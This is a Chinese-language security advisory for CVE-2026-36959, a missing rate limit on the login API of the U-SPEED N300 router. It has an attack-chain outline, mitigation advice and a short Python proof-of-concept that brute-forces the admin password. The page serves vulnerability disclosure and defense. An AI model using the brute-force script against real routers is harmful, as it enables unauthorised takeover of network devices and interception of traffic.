CVE-2026-36959 CVSS 7.5 高危

CVE-2026-36959 U-SPEED N300路由器暴力破解漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-36959

漏洞类型

暴力破解

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

U-SPEED N300 router

漏洞概述

U-SPEED N300路由器V1.0.0版本存在严重的安全缺陷。由于设备/api/login登录接口缺乏必要的速率限制及账户锁定保护机制，攻击者能够在局域网环境下发起无限次的身份验证请求。这使得针对管理员账户的暴力破解攻击成为可能，成功后可导致路由器管理界面被未授权访问，造成设备控制权泄露。

技术细节

该漏洞的根源在于U-SPEED N300路由器后端认证逻辑的设计缺陷。具体而言，在处理/api/login端点的POST请求时，系统未对客户端的请求频率实施任何监控或限制，也未在检测到多次失败的登录尝试后触发账户临时锁定或验证码机制。攻击者只需连接至受害者所在的局域网，即可通过Python等脚本工具向该端点持续发送包含不同密码组合的HTTP POST请求。由于缺乏关键的速率限制防护，攻击者可以采用高并发或持续低速的方式进行字典攻击或撞库，直到成功猜解出正确的管理员密码。一旦认证通过，攻击者即可利用获取的Session ID或管理Token完全接管路由器的控制权，修改网络配置或窃取敏感流量。

攻击链分析

STEP 1

网络侦察

攻击者连接到目标局域网，通过扫描发现U-SPEED N300路由器的IP地址。

STEP 2

漏洞利用

攻击者编写脚本，利用/api/login接口无频率限制的缺陷，发送大量包含不同密码的POST请求。

STEP 3

凭证窃取

通过不断的尝试和响应分析，成功匹配出管理员账户的正确密码。

STEP 4

系统控制

使用获取的管理员凭证登录路由器后台，修改配置、窃取数据或植入恶意固件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://<ROUTER_IP>/api/login"
username = "admin"

# Common password list for demonstration
password_list = ["admin", "password", "12345678", "root", "admin123"]

print(f"[*] Starting brute force attack on {target_url}")

for password in password_list:
    payload = {
        "username": username,
        "password": password
    }
    
    try:
        # Send login request
        response = requests.post(target_url, json=payload, timeout=5)
        
        # Check for successful login indicators (adjust based on actual response)
        if response.status_code == 200 and "success" in response.text.lower():
            print(f"[+] SUCCESS! Password found: {password}")
            print(f"[+] Response: {response.text}")
            break
        else:
            print(f"[-] Failed attempt with password: {password}")
            
    except requests.RequestException as e:
        print(f"[!] Connection error: {e}")
        break

影响范围

U-SPEED N300 router V1.0.0

防御指南

临时缓解措施

建议立即修改路由器后台管理员密码，确保密码强度足够。同时，检查并关闭路由器的远程管理功能（WAN访问），仅允许局域网内特定设备管理设备，并在官方发布修复补丁后第一时间进行升级。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-36959
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-36959
3 Details https://www.cvedetails.com/cve/CVE-2026-36959/
4 VulDB https://vuldb.com/cve/CVE-2026-36959
5 Link http://u-speed.com
6 Link https://github.com/kirubel-cve/CVE-2026-36959
7 Link https://github.com/kirubel-cve/CVE-2026-36959

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表